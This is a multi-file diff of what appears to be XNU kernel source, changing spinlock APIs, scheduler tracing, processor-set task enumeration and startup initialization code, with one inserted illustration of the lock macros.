+               kext_receipt_set_queried();
+       }
+       return ret;
+}
+
+/*
+ * Returns KERN_FAILURE if the variable was already set.
+ */
+kern_return_t
+kext_receipt_set_queried()
+{
+       return OSKextSetReceiptQueried();
 }
index a629bec2ef9f9fd38dcb68c7cc19a06480223bb9..70d34ff9edce4462ace321500fb3e6e2e4145a59 100644 (file)
@@ -43,6 +43,8 @@ void kext_free(vm_offset_t addr, vm_size_t size);
 
 kern_return_t kext_receipt(void **addrp, size_t *sizep);
 
+kern_return_t kext_receipt_set_queried(void);
+
 __END_DECLS
 
 #endif /* _KEXT_ALLOC_H_ */
index 0214122e595abab1f92fec53f5909ff0c71eeff6..ae29df20d30a7dffd345bf6918733dbf5f0fdb19 100644 (file)
@@ -121,18 +121,18 @@ enum lockstat_probe_id {
 
 #if CONFIG_DTRACE
 extern uint32_t lockstat_probemap[LS_NPROBES];
-extern void (*lockstat_probe)(uint32_t, uint64_t, uint64_t,
+extern void dtrace_probe(uint32_t, uint64_t, uint64_t,
     uint64_t, uint64_t, uint64_t);
 /*
  * Macros to record lockstat probes.
  */
 #define LOCKSTAT_RECORD4(probe, lp, arg0, arg1, arg2, arg3)             \
-       {                                                               \
-               uint32_t id;                                         \
-               if (__improbable(id = lockstat_probemap[(probe)])) {            \
-                       (*lockstat_probe)(id, (uintptr_t)(lp), (arg0),  \
-                           (arg1), (arg2), (arg3));                    \
-               }                                                       \
+       {                                                                   \
+               uint32_t id;                                                \
+               if (__improbable(id = lockstat_probemap[(probe)])) {        \
+                       dtrace_probe(id, (uintptr_t)(lp), (arg0),           \
+                           (arg1), (arg2), (arg3));                        \
+               }                                                           \
        }
 #define LOCKSTAT_RECORD_(probe, lp, arg0, arg1, arg2, arg3, ...) LOCKSTAT_RECORD4(probe, lp, arg0, arg1, arg2, arg3)
 #define LOCKSTAT_RECORD__(probe, lp, arg0, arg1, arg2, arg3, ...) LOCKSTAT_RECORD_(probe, lp, arg0, arg1, arg2, arg3)
index aa28feb62a8fdd7041e1f9cc62f2aba9ac0a24a7..9e626c3de0c6bb779b8e62fc7b262fde0fdef6e3 100644 (file)
@@ -497,7 +497,7 @@ lck_attr_free(
  *
  *     Initialize a hardware lock.
  */
-void
+MARK_AS_HIBERNATE_TEXT void
 hw_lock_init(hw_lock_t lock)
 {
        ordered_store_hw(lock, 0);
@@ -672,23 +672,13 @@ void
        hw_lock_lock_internal(lock, thread LCK_GRP_ARG(grp));
 }
 
-/*
- *     Routine: hw_lock_to
- *
- *     Acquire lock, spinning until it becomes available or timeout.
- *     Timeout is in mach_absolute_time ticks, return with
- *     preemption disabled.
- */
-unsigned
-int
-(hw_lock_to)(hw_lock_t lock, uint64_t timeout LCK_GRP_ARG(lck_grp_t *grp))
+static inline unsigned int
+hw_lock_to_internal(hw_lock_t lock, uint64_t timeout, thread_t thread
+    LCK_GRP_ARG(lck_grp_t *grp))
 {
-       thread_t        thread;
-       uintptr_t       state;
+       uintptr_t state;
        unsigned int success = 0;
 
-       thread = current_thread();
-       disable_preemption_for_thread(thread);
        state = LCK_MTX_THREAD_TO_STATE(thread) | PLATFORM_LCK_ILOCK;
 #if     LOCK_PRETEST
        if (ordered_load_hw(lock)) {
@@ -710,6 +700,40 @@ end:
        return success;
 }
 
+/*
+ *     Routine: hw_lock_to
+ *
+ *     Acquire lock, spinning until it becomes available or timeout.
+ *     Timeout is in mach_absolute_time ticks, return with
+ *     preemption disabled.
+ */
+unsigned
+int
+(hw_lock_to)(hw_lock_t lock, uint64_t timeout LCK_GRP_ARG(lck_grp_t *grp))
+{
+       thread_t thread = current_thread();
+       disable_preemption_for_thread(thread);
+       return hw_lock_to_internal(lock, timeout, thread LCK_GRP_ARG(grp));
+}
+
+/*
+ *     Routine: hw_lock_to_nopreempt
+ *
+ *     Acquire lock, spinning until it becomes available or timeout.
+ *     Timeout is in mach_absolute_time ticks, called and return with
+ *     preemption disabled.
+ */
+unsigned
+int
+(hw_lock_to_nopreempt)(hw_lock_t lock, uint64_t timeout LCK_GRP_ARG(lck_grp_t *grp))
+{
+       thread_t thread = current_thread();
+       if (__improbable(!preemption_disabled_for_thread(thread))) {
+               panic("Attempt to test no-preempt spinlock %p in preemptible context", lock);
+       }
+       return hw_lock_to_internal(lock, timeout, thread LCK_GRP_ARG(grp));
+}
+
 /*
  *     Routine: hw_lock_try
  *
index 24879020598a512c4240c290a7bf64a3c0f215da..03f9287d46552894b38a063619bc45c143423a81 100644 (file)
@@ -75,7 +75,6 @@
 #include <mach/processor_server.h>
 
 #include <kern/kern_types.h>
-#include <kern/counters.h>
 #include <kern/cpu_data.h>
 #include <kern/cpu_quiesce.h>
 #include <kern/ipc_host.h>
@@ -175,8 +174,6 @@ host_reboot(
                return KERN_INVALID_HOST;
        }
 
-       assert(host_priv == &realhost);
-
 #if DEVELOPMENT || DEBUG
        if (options & HOST_REBOOT_DEBUGGER) {
                Debugger("Debugger");
@@ -466,8 +463,6 @@ host_get_boot_info(
                return KERN_INVALID_HOST;
        }
 
-       assert(host_priv == &realhost);
-
        /*
         * Copy first operator string terminated by '\0' followed by
         *      standardized strings generated from boot string.
index fc1b4b6f456e555adba15aeef44064b8245b54d2..f0a7f35352009b64fae2228f02ceece7415f8c1f 100644 (file)
@@ -158,6 +158,9 @@ extern void proc_inherit_task_role(task_t new_task, task_t old_task);
 
 #if CONFIG_IOSCHED
 #define IOSCHED_METADATA_TIER                   THROTTLE_LEVEL_TIER1
+#define IOSCHED_METADATA_EXPEDITED_TIER         THROTTLE_LEVEL_TIER0
+_Static_assert(IOSCHED_METADATA_EXPEDITED_TIER < IOSCHED_METADATA_TIER,
+    "expedited metadata tier must be less than metadata tier");
 #endif /* CONFIG_IOSCHED */
 
 extern int proc_get_darwinbgstate(task_t task, uint32_t *flagsp);
index 898086d8ec3518c91e525bcb24f601d1f0228443..8acbbc8d45e54116f73e517324e82913e85c3ca0 100644 (file)
@@ -365,7 +365,7 @@ __doprnt(
 
                if (c == 'z' || c == 'Z') {
                        c = *++fmt;
-                       if (sizeof(size_t) == sizeof(unsigned long)) {
+                       if (sizeof(size_t) == sizeof(unsigned long long)) {
                                long_long = 1;
                        }
                }
index 3cffb3fed39dbbebb4e37fbfb9b66cbeebf92abd..01aa936af947d9949f962dcc5ff36ee82d48f742 100644 (file)
@@ -108,7 +108,9 @@ queue_head_t            corpse_tasks;
 int                     tasks_count;
 int                     terminated_tasks_count;
 queue_head_t            threads;
+queue_head_t            terminated_threads;
 int                     threads_count;
+int                     terminated_threads_count;
 LCK_GRP_DECLARE(task_lck_grp, "task");
 LCK_ATTR_DECLARE(task_lck_attr, 0, 0);
 LCK_MTX_DECLARE_ATTR(tasks_threads_lock, &task_lck_grp, &task_lck_attr);
@@ -179,6 +181,7 @@ processor_bootstrap(void)
        queue_init(&tasks);
        queue_init(&terminated_tasks);
        queue_init(&threads);
+       queue_init(&terminated_threads);
        queue_init(&corpse_tasks);
 
        processor_init(master_processor, master_cpu, &pset0);
@@ -1212,7 +1215,8 @@ processor_set_things(
        processor_set_t pset,
        void **thing_list,
        mach_msg_type_number_t *count,
-       int type)
+       int type,
+       mach_task_flavor_t flavor)
 {
        unsigned int i;
        task_t task;
@@ -1344,7 +1348,7 @@ processor_set_things(
 
        /* for each task, make sure we are allowed to examine it */
        for (i = used = 0; i < actual_tasks; i++) {
-               if (mac_task_check_expose_task(task_list[i])) {
+               if (mac_task_check_expose_task(task_list[i], flavor)) {
                        task_deallocate(task_list[i]);
                        continue;
                }
@@ -1455,12 +1459,12 @@ processor_set_tasks_internal(
        processor_set_t         pset,
        task_array_t            *task_list,
        mach_msg_type_number_t  *count,
-       int                     flavor)
+       mach_task_flavor_t      flavor)
 {
        kern_return_t ret;
        mach_msg_type_number_t i;
 
-       ret = processor_set_things(pset, (void **)task_list, count, PSET_THING_TASK);
+       ret = processor_set_things(pset, (void **)task_list, count, PSET_THING_TASK, flavor);
        if (ret != KERN_SUCCESS) {
                return ret;
        }
@@ -1469,7 +1473,12 @@ processor_set_tasks_internal(
        switch (flavor) {
        case TASK_FLAVOR_CONTROL:
                for (i = 0; i < *count; i++) {
-                       (*task_list)[i] = (task_t)convert_task_to_port((*task_list)[i]);
+                       if ((*task_list)[i] == current_task()) {
+                               /* if current_task(), return pinned port */
+                               (*task_list)[i] = (task_t)convert_task_to_port_pinned((*task_list)[i]);
+                       } else {
+                               (*task_list)[i] = (task_t)convert_task_to_port((*task_list)[i]);
+                       }
                }
                break;
        case TASK_FLAVOR_READ:
@@ -1559,7 +1568,7 @@ processor_set_threads(
        kern_return_t ret;
        mach_msg_type_number_t i;
 
-       ret = processor_set_things(pset, (void **)thread_list, count, PSET_THING_THREAD);
+       ret = processor_set_things(pset, (void **)thread_list, count, PSET_THING_THREAD, TASK_FLAVOR_CONTROL);
        if (ret != KERN_SUCCESS) {
                return ret;
        }
index eb2246cbd5993dbc2a44b785b421cff4b1714a6c..16927ab1719fb7efe063c1c16ecae8f3bf3c2894 100644 (file)
@@ -291,7 +291,7 @@ struct pset_node {
 extern struct pset_node pset_node0;
 
 extern queue_head_t tasks, threads, corpse_tasks;
-extern int tasks_count, terminated_tasks_count, threads_count;
+extern int tasks_count, terminated_tasks_count, threads_count, terminated_threads_count;
 decl_lck_mtx_data(extern, tasks_threads_lock);
 decl_lck_mtx_data(extern, tasks_corpse_lock);
 
@@ -300,6 +300,8 @@ decl_lck_mtx_data(extern, tasks_corpse_lock);
  */
 extern queue_head_t terminated_tasks;
 
+extern queue_head_t terminated_threads;
+
 struct processor {
        processor_state_t       state;                  /* See above */
        bool                    is_SMT;
index 2f06bca905e915574544237691b78163c521a4ed..a757f709f2273e47b61e1979fb15c1f58810f20d 100644 (file)
@@ -670,40 +670,6 @@ sched_amp_thread_group_recommendation_change(struct thread_group *tg, cluster_ty
 }
 
 #if DEVELOPMENT || DEBUG
-extern int32_t sysctl_get_bound_cpuid(void);
-int32_t
-sysctl_get_bound_cpuid(void)
-{
-       int32_t cpuid = -1;
-       thread_t self = current_thread();
-
-       processor_t processor = self->bound_processor;
-       if (processor == NULL) {
-               cpuid = -1;
-       } else {
-               cpuid = processor->cpu_id;
-       }
-
-       return cpuid;
-}
-
-extern void sysctl_thread_bind_cpuid(int32_t cpuid);
-void
-sysctl_thread_bind_cpuid(int32_t cpuid)
-{
-       if (cpuid < 0 || cpuid >= MAX_SCHED_CPUS) {
-               return;
-       }
-
-       processor_t processor = processor_array[cpuid];
-       if (processor == PROCESSOR_NULL) {
-               return;
-       }
-
-       thread_bind(processor);
-
-       thread_block(THREAD_CONTINUE_NULL);
-}
 
 extern char sysctl_get_bound_cluster_type(void);
 char
@@ -765,6 +731,6 @@ sysctl_task_set_cluster_type(char cluster_type)
 
        thread_block(THREAD_CONTINUE_NULL);
 }
-#endif
+#endif /* DEVELOPMENT || DEBUG */
 
-#endif
+#endif /* __AMP__ */
index f74e8b960d421fda3058a1e96b5ba0ee4a72df77..f2bd777ffeadb51590abc91526b1e2c2715934c5 100644 (file)
@@ -71,6 +71,7 @@
 #if CONFIG_TELEMETRY
 #include <kern/telemetry.h>
 #endif
+#include <kern/zalloc_internal.h>
 
 #include <sys/kdebug.h>
 
@@ -112,6 +113,7 @@ static struct sched_average {
        { compute_stack_target, NULL, 5, 1 },
        { compute_pageout_gc_throttle, NULL, 1, 0 },
        { compute_pmap_gc_throttle, NULL, 60, 0 },
+       { compute_zone_working_set_size, NULL, ZONE_WSS_UPDATE_PERIOD, 0 },
 #if CONFIG_TELEMETRY
        { compute_telemetry, NULL, 1, 0 },
 #endif
index 64075494751c352060d4c19e36244eeceb944ae3..adcec01c668b9745fda1a2aa307cd514c9ca6003 100644 (file)
@@ -83,7 +83,6 @@
 #include <kern/kern_types.h>
 #include <kern/backtrace.h>
 #include <kern/clock.h>
-#include <kern/counters.h>
 #include <kern/cpu_number.h>
 #include <kern/cpu_data.h>
 #include <kern/smp.h>
@@ -687,6 +686,8 @@ thread_unblock(
 
                ctime = mach_absolute_time();
                thread->realtime.deadline = thread->realtime.constraint + ctime;
+               KDBG(MACHDBG_CODE(DBG_MACH_SCHED, MACH_SET_RT_DEADLINE) | DBG_FUNC_NONE,
+                   (uintptr_t)thread_tid(thread), thread->realtime.deadline, thread->realtime.computation, 0);
        }
 
        /*
@@ -2098,6 +2099,10 @@ restart:
                        }
                }
 
+               bool secondary_forced_idle = ((processor->processor_secondary != PROCESSOR_NULL) &&
+                   (thread_no_smt(thread) || (thread->sched_pri >= BASEPRI_RTQUEUES)) &&
+                   (processor->processor_secondary->state == PROCESSOR_IDLE));
+
                /* OK, so we're not going to run the current thread. Look at the RT queue. */
                bool ok_to_run_realtime_thread = sched_ok_to_run_realtime_thread(pset, processor);
                if ((rt_runq_count(pset) > 0) && ok_to_run_realtime_thread) {
@@ -2174,6 +2179,10 @@ pick_new_rt_thread:
                                        ipi_type = sched_ipi_action(sprocessor, NULL, false, SCHED_IPI_EVENT_SMT_REBAL);
                                        ast_processor = sprocessor;
                                }
+                       } else if (secondary_forced_idle && !thread_no_smt(new_thread) && pset_has_stealable_threads(pset)) {
+                               pset_update_processor_state(pset, sprocessor, PROCESSOR_DISPATCHING);
+                               ipi_type = sched_ipi_action(sprocessor, NULL, true, SCHED_IPI_EVENT_PREEMPT);
+                               ast_processor = sprocessor;
                        }
                        pset_unlock(pset);
 
@@ -2428,8 +2437,6 @@ thread_invoke(
 
                        thread->continuation = thread->parameter = NULL;
 
-                       counter(c_thread_invoke_hits++);
-
                        boolean_t enable_interrupts = TRUE;
 
                        /* idle thread needs to stay interrupts-disabled */
@@ -2444,7 +2451,6 @@ thread_invoke(
                } else if (thread == self) {
                        /* same thread but with continuation */
                        ast_context(self);
-                       counter(++c_thread_invoke_same);
 
                        thread_unlock(self);
 
@@ -2484,14 +2490,12 @@ thread_invoke(
                if (!thread->kernel_stack) {
 need_stack:
                        if (!stack_alloc_try(thread)) {
-                               counter(c_thread_invoke_misses++);
                                thread_unlock(thread);
                                thread_stack_enqueue(thread);
                                return FALSE;
                        }
                } else if (thread == self) {
                        ast_context(self);
-                       counter(++c_thread_invoke_same);
                        thread_unlock(self);
 
                        KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE,
@@ -2521,8 +2525,6 @@ need_stack:
 
        thread_unlock(thread);
 
-       counter(c_thread_invoke_csw++);
-
        self->reason = reason;
 
        processor->last_dispatch = ctime;
@@ -2845,6 +2847,8 @@ thread_dispatch(
                                 *      consumed the entire quantum.
                                 */
                                if (thread->quantum_remaining == 0) {
+                                       KDBG(MACHDBG_CODE(DBG_MACH_SCHED, MACH_CANCEL_RT_DEADLINE) | DBG_FUNC_NONE,
+                                           (uintptr_t)thread_tid(thread), thread->realtime.deadline, thread->realtime.computation, 0);
                                        thread->realtime.deadline = UINT64_MAX;
                                }
                        } else {
@@ -3103,8 +3107,6 @@ thread_dispatch(
  *     thread resumes, it will execute the continuation function
  *     on a new kernel stack.
  */
-counter(mach_counter_t  c_thread_block_calls = 0; )
-
 wait_result_t
 thread_block_reason(
        thread_continue_t       continuation,
@@ -3116,8 +3118,6 @@ thread_block_reason(
        thread_t        new_thread;
        spl_t           s;
 
-       counter(++c_thread_block_calls);
-
        s = splsched();
 
        processor = current_processor();
@@ -6921,3 +6921,61 @@ thread_bind_cluster_type(thread_t thread, char cluster_type, bool soft_bound)
        (void)soft_bound;
 #endif /* __AMP__ */
 }
+
+#if DEVELOPMENT || DEBUG
+extern int32_t sysctl_get_bound_cpuid(void);
+int32_t
+sysctl_get_bound_cpuid(void)
+{
+       int32_t cpuid = -1;
+       thread_t self = current_thread();
+
+       processor_t processor = self->bound_processor;
+       if (processor == NULL) {
+               cpuid = -1;
+       } else {
+               cpuid = processor->cpu_id;
+       }
+
+       return cpuid;
+}
+
+extern kern_return_t sysctl_thread_bind_cpuid(int32_t cpuid);
+kern_return_t
+sysctl_thread_bind_cpuid(int32_t cpuid)
+{
+       processor_t processor = PROCESSOR_NULL;
+
+       if (cpuid == -1) {
+               goto unbind;
+       }
+
+       if (cpuid < 0 || cpuid >= MAX_SCHED_CPUS) {
+               return KERN_INVALID_VALUE;
+       }
+
+       processor = processor_array[cpuid];
+       if (processor == PROCESSOR_NULL) {
+               return KERN_INVALID_VALUE;
+       }
+
+#if __AMP__
+
+       thread_t thread = current_thread();
+
+       if (thread->sched_flags & (TH_SFLAG_ECORE_ONLY | TH_SFLAG_PCORE_ONLY)) {
+               if ((thread->sched_flags & TH_SFLAG_BOUND_SOFT) == 0) {
+                       /* Cannot hard-bind an already hard-cluster-bound thread */
+                       return KERN_NOT_SUPPORTED;
+               }
+       }
+
+#endif /* __AMP__ */
+
+unbind:
+       thread_bind(processor);
+
+       thread_block(THREAD_CONTINUE_NULL);
+       return KERN_SUCCESS;
+}
+#endif /* DEVELOPMENT || DEBUG */
index 67eb289710c36affc25428e2280db82acc44af88..7d08bea4b71f522ea91bc836866c4b4c7d3175e6 100644 (file)
 #include <kern/lock_group.h>
 #include <machine/simple_lock.h>
 
-#ifdef MACH_KERNEL_PRIVATE
+#ifdef XNU_KERNEL_PRIVATE
+
+#if MACH_KERNEL_PRIVATE
 #include <machine/atomic.h>
 #include <mach_ldebug.h>
+#endif
+
+__BEGIN_DECLS
+
+#pragma GCC visibility push(hidden)
 
+#ifdef MACH_KERNEL_PRIVATE
 extern void                     hw_lock_init(
        hw_lock_t);
 
@@ -97,6 +105,11 @@ extern unsigned int             hw_lock_to(
        uint64_t,
        lck_grp_t*);
 
+extern unsigned int             hw_lock_to_nopreempt(
+       hw_lock_t,
+       uint64_t,
+       lck_grp_t*);
+
 extern unsigned int             hw_lock_try(
        hw_lock_t,
        lck_grp_t*);
@@ -109,27 +122,36 @@ extern unsigned int             hw_lock_try_nopreempt(
 
 extern void                     hw_lock_lock(
        hw_lock_t);
-
-#define hw_lock_lock(lck, grp) hw_lock_lock(lck)
+#define hw_lock_lock(lck, grp) \
+       hw_lock_lock(lck)
 
 extern void                     hw_lock_lock_nopreempt(
        hw_lock_t);
-#define hw_lock_lock_nopreempt(lck, grp) hw_lock_lock_nopreempt(lck)
+#define hw_lock_lock_nopreempt(lck, grp) \
+       hw_lock_lock_nopreempt(lck)
 
 extern unsigned int             hw_lock_to(
        hw_lock_t,
        uint64_t);
-#define hw_lock_to(lck, timeout, grp) hw_lock_to(lck, timeout)
+#define hw_lock_to(lck, timeout, grp) \
+       hw_lock_to(lck, timeout)
+
+extern unsigned int             hw_lock_to_nopreempt(
+       hw_lock_t,
+       uint64_t);
+#define hw_lock_to_nopreempt(lck, timeout, grp) \
+       hw_lock_to_nopreempt(lck, timeout)
 
 
 extern unsigned int             hw_lock_try(
        hw_lock_t);
-#define hw_lock_try(lck, grp) hw_lock_try(lck)
+#define hw_lock_try(lck, grp) \
+       hw_lock_try(lck)
 
 extern unsigned int             hw_lock_try_nopreempt(
        hw_lock_t);
-#define hw_lock_try_nopreempt(lck, grp) hw_lock_try_nopreempt(lck)
-
+#define hw_lock_try_nopreempt(lck, grp) \
+       hw_lock_try_nopreempt(lck)
 
 #endif /* LOCK_STATS */
 
@@ -149,8 +171,10 @@ extern boolean_t                hw_atomic_test_and_set32(
        enum memory_order ord,
        boolean_t wait);
 
+extern void                     usimple_unlock_nopreempt(
+       usimple_lock_t);
+
 #endif /* MACH_KERNEL_PRIVATE */
-#if XNU_KERNEL_PRIVATE
 
 struct usimple_lock_startup_spec {
        usimple_lock_t  lck;
@@ -167,10 +191,6 @@ extern void                     usimple_lock_startup_init(
        STARTUP_ARG(LOCKS_EARLY, STARTUP_RANK_FOURTH, usimple_lock_startup_init, \
            &__startup_usimple_lock_spec_ ## var)
 
-#endif /* XNU_KERNEL_PRIVATE */
-
-__BEGIN_DECLS
-
 extern void *                   hw_wait_while_equals(
        void    **address,
        void    *current);
@@ -203,32 +223,35 @@ extern unsigned int     usimple_lock_try_lock_mp_signal_safe_loop_duration(
        uint64_t,
        lck_grp_t*);
 #endif
-
 #else
 extern void                     usimple_lock(
        usimple_lock_t);
-#define usimple_lock(lck, grp) usimple_lock(lck)
+#define usimple_lock(lck, grp) \
+       usimple_lock(lck)
 
 
 extern unsigned int             usimple_lock_try(
        usimple_lock_t);
-
-#define usimple_lock_try(lck, grp) usimple_lock_try(lck)
+#define usimple_lock_try(lck, grp) \
+       usimple_lock_try(lck)
 
 extern void             usimple_lock_try_lock_loop(
        usimple_lock_t);
-#define usimple_lock_try_lock_loop(lck, grp) usimple_lock_try_lock_loop(lck)
+#define usimple_lock_try_lock_loop(lck, grp) \
+       usimple_lock_try_lock_loop(lck)
 
 #if defined(__x86_64__)
 extern unsigned int     usimple_lock_try_lock_mp_signal_safe_loop_deadline(
        usimple_lock_t,
        uint64_t);
-#define usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl, grp) usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl)
+#define usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl, grp) \
+       usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl)
 
 extern unsigned int     usimple_lock_try_lock_mp_signal_safe_loop_duration(
        usimple_lock_t,
        uint64_t);
-#define usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur, grp) usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur)
+#define usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur, grp) \
+       usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur)
 #endif
 
 #endif /* LOCK_STATS */
@@ -237,24 +260,21 @@ extern void                     usimple_unlock(
        usimple_lock_t);
 
 
-__END_DECLS
-
-#define ETAP_NO_TRACE   0
-#define ETAP_IO_AHA             0
-
 /*
  * If we got to here and we still don't have simple_lock_init
  * defined, then we must either be outside the osfmk component,
  * running on a true SMP, or need debug.
  */
 #if !defined(simple_lock_init)
-#define simple_lock_init(l, t)   usimple_lock_init(l,t)
-#define simple_lock(l, grp)          usimple_lock(l, grp)
-#define simple_unlock(l)        usimple_unlock(l)
-#define simple_lock_try(l, grp)      usimple_lock_try(l, grp)
+#define simple_lock_init(l, t)               usimple_lock_init(l,t)
+#define simple_lock(l, grp)                  usimple_lock(l, grp)
+#define simple_unlock(l)                     usimple_unlock(l)
+#define simple_lock_try(l, grp)              usimple_lock_try(l, grp)
 #define simple_lock_try_lock_loop(l, grp)    usimple_lock_try_lock_loop(l, grp)
-#define simple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp)    usimple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp)
-#define simple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp)    usimple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp)
+#define simple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp) \
+       usimple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp)
+#define simple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp) \
+       usimple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp)
 #define simple_lock_addr(l)     (&(l))
 #endif /* !defined(simple_lock_init) */
 
@@ -288,23 +308,27 @@ extern unsigned int hw_lock_bit_to(
 extern void     hw_lock_bit(
        hw_lock_bit_t *,
        unsigned int);
-#define hw_lock_bit(lck, bit, grp) hw_lock_bit(lck, bit)
+#define hw_lock_bit(lck, bit, grp) \
+       hw_lock_bit(lck, bit)
 
 extern void     hw_lock_bit_nopreempt(
        hw_lock_bit_t *,
        unsigned int);
-#define hw_lock_bit_nopreempt(lck, bit, grp) hw_lock_bit_nopreempt(lck, bit)
+#define hw_lock_bit_nopreempt(lck, bit, grp) \
+       hw_lock_bit_nopreempt(lck, bit)
 
 extern unsigned int hw_lock_bit_try(
        hw_lock_bit_t *,
        unsigned int);
-#define hw_lock_bit_try(lck, bit, grp) hw_lock_bit_try(lck, bit)
+#define hw_lock_bit_try(lck, bit, grp) \
+       hw_lock_bit_try(lck, bit)
 
 extern unsigned int hw_lock_bit_to(
        hw_lock_bit_t *,
        unsigned int,
        uint32_t);
-#define hw_lock_bit_to(lck, bit, timeout, grp) hw_lock_bit_to(lck, bit, timeout)
+#define hw_lock_bit_to(lck, bit, timeout, grp) \
+       hw_lock_bit_to(lck, bit, timeout)
 
 #endif /* LOCK_STATS */
 
@@ -316,10 +340,16 @@ extern void     hw_unlock_bit_nopreempt(
        hw_lock_bit_t *,
        unsigned int);
 
-#define hw_lock_bit_held(l, b) (((*(l))&(1<<b))!=0)
+#define hw_lock_bit_held(l, b) \
+       (((*(l)) & (1 << (b))) != 0)
 
 #endif  /* MACH_KERNEL_PRIVATE */
 
+__END_DECLS
+
+#pragma GCC visibility pop
+
+#endif /* XNU_KERNEL_PRIVATE */
 #endif /*!_KERN_SIMPLE_LOCK_H_*/
 
 #endif  /* KERNEL_PRIVATE */
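
As a hedged illustration (not in the commit), the grp-dropping macros above let one call site compile with or without LOCK_STATS; the lock and group names below are hypothetical:

LCK_GRP_DECLARE(example_grp, "example");
static hw_lock_data_t example_lock;    /* hw_lock_init(&example_lock) assumed at startup */

static bool
example_timed_lock(uint64_t timeout_ticks)
{
	/* With LOCK_STATS this is the real 3-argument hw_lock_to(); without it,
	 * the macro expands to hw_lock_to(&example_lock, timeout_ticks). */
	if (hw_lock_to(&example_lock, timeout_ticks, &example_grp)) {
		/* ... critical section ... */
		hw_lock_unlock(&example_lock);
		return true;
	}
	return false;
}
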
index 5f19428395bf96f3c4402f98def07bf4784b4d8d..12cbd907b6b1959f2ed6bd7656cb168cd836b645 100644 (file)
@@ -197,7 +197,6 @@ void scale_setup(void);
 extern void bsd_scale_setup(int);
 extern unsigned int semaphore_max;
 extern void stackshot_init(void);
-extern void ktrace_init(void);
 
 /*
  *     Running in virtual memory, on the interrupt stack.
@@ -324,6 +323,7 @@ kernel_startup_log(startup_subsystem_id_t subsystem)
                [STARTUP_SUB_CODESIGNING] = "codesigning",
                [STARTUP_SUB_OSLOG] = "oslog",
                [STARTUP_SUB_MACH_IPC] = "mach_ipc",
+               [STARTUP_SUB_SYSCTL] = "sysctl",
                [STARTUP_SUB_EARLY_BOOT] = "early_boot",
 
                /* LOCKDOWN is special and its value won't fit here. */
@@ -642,13 +642,6 @@ kernel_bootstrap_thread(void)
        bootprofile_init();
 #endif
 
-#if (defined(__i386__) || defined(__x86_64__)) && CONFIG_VMX
-       vmx_init();
-#endif
-
-       kernel_bootstrap_thread_log("ktrace_init");
-       ktrace_init();
-
        char trace_typefilter[256] = {};
        PE_parse_boot_arg_str("trace_typefilter", trace_typefilter,
            sizeof(trace_typefilter));
@@ -658,10 +651,7 @@ kernel_bootstrap_thread(void)
        kdebug_init(new_nkdbufs, trace_typefilter,
            (trace_wrap ? KDOPT_WRAPPING : 0) | KDOPT_ATBOOT);
 
-#ifdef  MACH_BSD
-       kernel_bootstrap_log("bsd_early_init");
-       bsd_early_init();
-#endif
+       kernel_startup_initialize_upto(STARTUP_SUB_SYSCTL);
 
 #ifdef  IOKIT
        kernel_bootstrap_log("PE_init_iokit");
index 6c5e01b333e9d8b9d1b0ba6394bc997ea49b523d..83f26c45ef4794b64d557b8103b7bdf778374e45 100644 (file)
@@ -153,8 +153,8 @@ __enum_decl(startup_rank_t, uint32_t, {
 #elif defined(__x86_64__)
 /* Intel doesn't have a __BOOTDATA but doesn't protect __KLD */
 #define STARTUP_CODE_SEGSECT "__TEXT,__text"
-#define STARTUP_DATA_SEGSECT "__KLD,__init"
-#define STARTUP_HOOK_SEGMENT "__KLD"
+#define STARTUP_DATA_SEGSECT "__KLDDATA,__init"
+#define STARTUP_HOOK_SEGMENT "__KLDDATA"
 #define STARTUP_HOOK_SECTION "__init_entry_set"
 #else
 /* arm protects __KLD early, so use __BOOTDATA for data */
@@ -175,7 +175,7 @@ __enum_decl(startup_rank_t, uint32_t, {
  */
 #define __startup_func \
        __PLACE_IN_SECTION(STARTUP_CODE_SEGSECT) \
-       __attribute__((noinline, visibility("hidden")))
+       __attribute__((cold, visibility("hidden")))
 
 /*!
  * @macro __startup_data
@@ -260,20 +260,28 @@ __enum_decl(startup_rank_t, uint32_t, {
        static __startup_data struct startup_tunable_spec \
        __startup_TUNABLES_spec_ ## var = { \
            .name = __startup_TUNABLES_name_ ## var, \
-           .var_addr = &var, \
+           .var_addr = (void *)&var, \
            .var_len = sizeof(type_t), \
            .var_is_bool = __builtin_types_compatible_p(bool, type_t), \
        }; \
        __STARTUP_ARG(var, __LINE__, TUNABLES, STARTUP_RANK_FIRST, \
            kernel_startup_tunable_init, &__startup_TUNABLES_spec_ ## var)
 
+#ifdef __cplusplus
+#define __STARTUP_FUNC_CAST(func, a) \
+           (void(*)(const void *))func
+#else
+#define __STARTUP_FUNC_CAST(func, a) \
+           (typeof(func(a))(*)(const void *))func
+#endif
+
 
 #define __STARTUP1(name, line, subsystem, rank, func, a, b) \
        __PLACE_IN_SECTION(STARTUP_HOOK_SEGMENT "," STARTUP_HOOK_SECTION) \
        static const struct startup_entry \
        __startup_ ## subsystem ## _entry_ ## name ## _ ## line = { \
            STARTUP_SUB_ ## subsystem, \
-           rank, (typeof(func(a))(*)(const void *))func, b, \
+           rank, __STARTUP_FUNC_CAST(func, a), b, \
        }
 
 #define __STARTUP(name, line, subsystem, rank, func) \
@@ -325,7 +333,6 @@ extern void device_service_create(void);
 
 /* BSD subsystem initialization */
 extern void bsd_init(void);
-extern void bsd_early_init(void);
 
 #endif  /* MACH_BSD */
 
index c2a963d04d196d2f525897fbc7fcee99aa1513eb..40825399ec05823d8d398a5ba95eebfb6f28d192 100644 (file)
@@ -113,7 +113,7 @@ suid_cred_destroy(ipc_port_t port)
 
        ip_lock(port);
        assert(ip_kotype(port) == IKOT_SUID_CRED);
